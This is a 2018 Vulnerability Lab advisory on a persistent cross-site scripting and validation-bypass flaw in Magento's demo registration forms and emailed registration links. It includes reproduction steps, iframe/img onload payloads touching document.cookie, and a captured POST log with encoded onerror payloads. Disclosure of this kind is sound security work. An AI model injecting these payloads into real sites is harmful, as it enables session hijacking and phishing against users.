Magento Products T1 - Bypass & Persistent Vulnerability

Document Title:
===============
Magento Products T1 - Bypass & Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1919


Release Date:
=============
2018-06-19


Vulnerability Laboratory ID (VL-ID):
====================================
1919


Common Vulnerability Scoring System:
====================================
4.2


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Magento is an open source e-commerce web application that was launched on March 31, 2008 under the name Bento. It was developed 
by Varien (now Magento, a division of eBay) with help from the programmers within the open source community but is now owned 
solely by eBay Inc. Magento was built using parts of the Zend Framework. It uses the entity-attribute-value (EAV) database model 
to store data. In November 2013, W3Techs estimated that Magento was used by 0.9% of all websites.

Our team of security professionals works hard to keep Magento customer information secure. What`s equally important to protecting 
this data? Our security researchers and user community. If you find a site that isn`t following our policies, or a vulnerability 
inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security  &  http://magento.com/security )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side validation and filter bypass vulnerability in the magento products tier 1 application.


Vulnerability Disclosure Timeline:
==================================
2018-06-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Magento
Product: Magento - Web Application Service 2016 Q3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
The filter bypass issue and persistent mail encode vulnerability has been discovered in the official magento demo service in tier1 (sender: [email protected]). 
The vulnerability allows remote attackers to bypass the validation procedure of the main magento tier 1 application and to execute malicious persistent scripts in 
affected modules or functions. 

The magento online service web application located on tier 1 does allow to inject script code as values to the database. After performing thus an internal employee 
takes the information to encode a link for a permanent registration via magento customer html database. The imported/exported database does contain wrong parsed 
context and is get send to the inbox of the followup request through the registration form of the magento website. Normally the validation prevents payloads 
inserted or as generated form to deny malicious interaction. In case of the new website module in tier one the employee that acts via web-application perform to 
encode the context. After that the attacker has a valid registration link via email2 server (http://email2.magento.com/) with id malicious id CGP00H0dX0FG0qs32402D01. 
Thus id can be used to perform malicious request with all email servers that are in use by magento and connected to the technologie. Thus impact tier 1 and tier 2 
web-application of magento. The arrived email comes of the main [email protected] email in tier one and the validation runs as well through the basic tier 1 
infrastructure of magento.

The leadCapture/save bug in marketo has already been reported with bounty by our core team. The issue is mainly refering to the filter bypass that results in the 
followup exploitation. The cases should be resolved and recognized separatly.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. 
Exploitation of the application-side validation web vulnerability requires no privileged web-application user account and only low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources and 
persistent manipulation of affected or connected service module context.

Request Method(s):
[+] [POST]

Vulnerable Domain(s):
[+] Magento (.com) - Tier 1

Vulnerable Module(s):
[+] Magento Product Demo Registration Forms
[+] Magento Email Registration Link

Vulnerable Parameter(s):
[+] firstname
[+] lastname

Affected Module(s):
[+] Magento Tier 1 - join us for a Magento 2.1 demo next week
[+] Magento Tier 2 - All contact form masks with the same conditions to generate the reg id link


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register for the main service with a script code payload in the firstname and lastname values
2. Wait for the generate of the link by the moderating employee "Brian Benic"
Note: On generate the saved values get connected without secure validation to the id request
3. Open your target inbox of the registration and the first execute occurs in the mail body next to the introduction words
4. Click the generated link in the email (exp. http://email2.magento.com/CGP00H0dX0FG0qs32402D01)
5. Now the payload is loaded of the database without secure parse and allow to insert a second time to the next formular request
6. Check the target inbox after the second registration and see that the same issue occurs again via filter bypass to another formular as well
Note: Attackers can now use the id of the email2 subdomain to request in other contact formulars connected to magento the same malicious request
6. Successful reproduce of the remote vulnerability in two different stages of the magento tier 1 application!

PoC: Payload Example
"><iframe src="evil.source" onload=alert(document.cookie) <%20<iframe>
"><img src="evil.source" onload=alert(document.cookie) <%20<iframe>

PoC: Exploitation (Registration Payload - Filter Bypass of Validation Mechanism)
http://email2.magento.com/CGP00H0dX0FG0qs32402D01

PoC: Exploitation (Inputs)
https://magento.com/campaign/see-a-demo-wtd
https://magento.com/campaign/see-a-demo-wtd?submitted=1

Malicious ID:
CGP00H0dX0FG0qs32402D01


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://app-sj16.marketo.com/index.php/leadCapture/save2 
Mime Type[application/json]
   Request Header:
      Host[app-sj16.marketo.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[https://app-sj16.marketo.com/index.php/form/XDFrame]
      Cookie[BIGipServersj16web-app_https=!lW9zkuuUdXHSCnzScTwF7CR830iJc0t0NTeHy2Dndw9MiEwLruc36CwY3U110NW9NpeNiOdwgLsL2L0=]
   POST-Daten:
      flexStringEvent[Magento%202.1%20Demo%20on%20August%2031%2C%202016%20at%207%3A30am%20PT%20%2F%202%3A30pm%20GMT]
      FirstName[%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Ci]
      LastName[%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%3Ciframe%20sr]
      Email[research%40vulnerability-lab.com]
      Company[%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%3Ciframe%20src
%3D%22x%22%3E%20%20%20%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%20%20%20%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(23)%3B%3E%3Ciframe%20src%3D%22x%22%3E]
      LeadSource[Magento%20Website]
      Lead_Source_Description__c[Demo%20-%20Enterprise]
      marketing_campaign__c[]
      marketing_medium__c[]
      marketing_source__c[]
      marketing_term__c[]
      Phone[31337]
      Organizational_Role__c[Merchant%2FRetailer%20(Enterprise%20Edition)]
      have_online_store[Yes]
      formid[2005]
      munchkinId[585-GGD-959]
      _mkt_trk[id%3A585-GGD-959%26token%3A_mch-magento.com-1471590610172-56988]
      formVid[2005]
      mkt_tok[eyJpIjoiTUdKbU1UTm1OR0ZtTUdJMyIsInQiOiJoeEErZDRcL2pacGZsVisxbW01T0xDaXo0ZlwveXFSVm41WmZOVzlHc1FVU2J2RmpHRXBqRHIwdXNSMmFDaFVlZXlacytIc0h2TkIwT2dXcENQNWRUOGdKSFFOYXRSa2tHWlNqZ2pLbjN4UnVBPSJ9]
      _mktoReferrer[https%3A%2F%2Fmagento.com%2Fcampaign%2Fsee-a-demo-wtd%3Fmkt_tok%3DeyJpIjoiTUdKbU1UTm1OR0ZtTUdJMyIsInQiOiJoeEErZDRcL2pacGZsVisxbW01T0xDaXo0ZlwveXFSVm41WmZOVzlHc1FVU2J2RmpHRXBqRHIwdXNSMmFDaFVlZXlacytIc0h2TkIwT2dXcENQNWRUOGdKSFFOYXRSa2tHWlNqZ2pLbjN4UnVBPSJ9]
   Response Header:
      Server[Apache]
      access-control-allow-origin[*]
      Vary[Accept-Encoding]
      Content-Type[application/json; charset=utf-8]
      Connection[keep-alive]
-
Status: 200[OK]
GET https://magento.com/campaign/see-a-demo-wtd?submitted=1
Mime Type[text/html]
   Request Header:
      Host[magento.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://magento.com/campaign/see-a-demo-wtd?mkt_tok=eyJpIjoiTUdKbU1UTm1OR0ZtTUdJMyIsInQiOiJoeEErZDRcL2pacGZsVisxbW01T0xDaXo0ZlwveXFSVm41WmZOVzlHc1FVU2J2RmpHRXBqRHIwdXNSMmFDaFVlZXlacytIc0h2TkIwT2dXcENQNWRUOGdKSFFOYXRSa2tHWlNqZ2pLbjN4UnVBPSJ9]
      Cookie[has_js=1; _ga=GA1.2.11845812.1471590610; _mkto_trk=id:585-GGD-959&token:_mch-magento.com-1471590610172-56988; _gat=1; _ceg.s=oc5aky; _ceg.u=oc5aky; optimizelyEndUserId=oeu1471590610390r0.
	9771229814229521; optimizelySegments=%7B%22237962548%22%3A%22ff%22%2C%22238367687%22%3A%22false%22%2C%22239237138%22%3A%22direct%22%7D; optimizelyBuckets=%7B%7D; _gali=mktoForm_2005]
      Connection[keep-alive]
   Response Header:
      Cache-Control[public, max-age=86400]
      Content-Type[text/html; charset=utf-8]
      Etag["1471590692-1"]
      Link[<https://magento.com/campaign/see-a-demo-wtd>; rel="canonical",<https://magento.com/node/1851>; rel="shortlink"]
      Server[nginx]
      Strict-Transport-Security[max-age=86400]
      Vary[Cookie, Accept-Encoding]
      X-Frame-Options[SameOrigin, SAMEORIGIN]
      Connection[keep-alive]


Reference(s):
http://email2.magento.com/
http://email2.magento.com/CGP00H0dX0FG0qs32402D01
https://magento.com/
https://magento.com/campaign/
https://magento.com/campaign/see-a-demo-wtd
https://magento.com/
https://magento.com/node/


Solution - Fix & Patch:
=======================
The security vulnerability can be patched by a secure parse of the id email2 parameter in the magento.com GET method request.
Disallow the usage of special chars and parse the values during the performed request to prevent an execution or inject.
Parse as well the followup reg id request to the email2 server to patch the issue permanently.

The issue on marketo side has been resolved in 2017 Q2 -4. The issue in the magento service which does not perform a 
secure validation process next to the hand over has been resolved in 2017 Q3-Q4.


Security Risk:
==============
The security risk of the application-side issue and filter bypass vulnerability in the magento tier 1 web-application is estimated as medium (CVSS 3.8).


Credits & Authors:
==================
Vulnerability Laboratory [Core Research Team] - ([email protected]) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 

Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

				    Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™